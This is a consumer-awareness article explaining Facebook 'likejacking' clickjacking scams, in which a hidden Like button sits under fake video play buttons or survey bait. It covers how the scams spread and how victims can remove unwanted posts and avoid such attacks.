Facebook Clickjacking Attacks

In a nutshell…

Clickjacking, in its most broadest sense, is a type of attack that involves hiding certain functions within a webpage that activate when a victim clicks on them – the victim is under the impression that their clicking action will perform a completely different function, unaware that the hidden script is present and has the ability to perform a completely unwanted action.

Facebook clickjacking attacks are one of the most prevalent, and are most commonly designed to get Facebook users to unwittingly "like" external websites which in turn spreads such websites to that Facebook users contact list.

Facebook clickjacking attacks are also dubbed "likejacking" since it utilises the "like" feature on Facebook.

How it works…

For anyone familiar with Facebook and how it operates, they will also be familiar with the ability to "Like" information such as comments, videos and status updates. When a Facebook "likes" something, it appears on their Facebook Wall that they "liked" it, which in turn will appear in the newsfeed of many of their contacts.
A recent addition to the "Like" feature is that website developers can add a button to their own websites that allow Facebook users to "Like" the website by clicking that button, meaning Facebook users do not have to be within the Facebook environment to use this feature.

This has led to scammers essentially hiding the Facebook "Like" button on their websites and then tricking users to clicking on the area of the webpage that contains the hidden button, so what essentially happens is that the user inadvertently “likes” a website by clicking on an area of a webpage. The user is unaware that they have "liked" a webpage and that this action has been published on their Facebook Wall and on the newsfeed of many of their contacts.

The clickjacking is designed to bait people into "liking" a page so that a page can propagate between Facebook users since Facebook contacts who have seen that their Facebook “friend” has “liked” a page are likely to visit the same page and fall for the same trap.

Popular Examples

The most prolific example of a clickjacking attack is where Facebook users are baited with a non-existent video. They are taken to a page which replicates a typical video sharing site. Users are clearly baited to click the Play icon in the middle of the video screen, and this is where the hidden Facebook "Like" button will be located. Clicking the Play button will cause the user to “like” the webpage.
Some sites try and replicate YouTube. Some use a logo displaying TouTube, FouTube or FBTube.

Other popular examples include requesting users to "prove their human" by clicking certain areas of a webpage in a certain order. The Facebook "Like" button is simply hidden in one of these areas.
Survey Scams

2011 has seen a significant increase in clickjacking attacks that are employed to help survey scammers. Facebook survey scams have previously used various tactics to help spread including rogue Facebook applications, forcing a user to "like" and "share" an external website or forcing them to join a Facebook group. Clickjacking is the latest tactic survey scammers are using to help them spread their malicious links.

Survey scams are when scammers trick victims into completing surveys on the false assertion the victim will receive/achieve something in return. Once a victim completes a survey, the scammer gets money. More information on Facebook survey scams can be seen here.

Victim?

If you are the victim of a clickjacking attack, the first thing you need to do is remove the offending “like” post that your Facebook account has just produced. Go to your profile and hover over the post. Click the "x" on the top right and then click Remove. This will stop your Facebook contacts from falling in the same trap.

For most clickjacking accounts on Facebook, this is all you need to do, since many clickjacking accounts do not involve any malicious payload.

If you feel you may have downloaded something onto your computer through the attack, run an up-to-date virus scam to check for threats.

Avoiding Clickjacking Attacks

The easiest way to avoid such attacks is to be careful on what links you click on Facebook and to always be wary of suspicious links and websites. If a link is offering you something that you think does not exist or is too good to be true, then it probably is.

There are other more dynamic ways to avoid clickjacking accounts as well, such as downloading and using the Firefox web browser to visit websites. Firefox has an optional downloadable NoScript plugin with disables any type of hidden script which can be utilised by clickjacking scammers. This plugin can be used to disable all types of embedded script on sites that you do not trust.

Additionally, always make sure you use the most recent version of your Internet browser (i.e. Internet Explorer, Firefox, Opera, Chrome)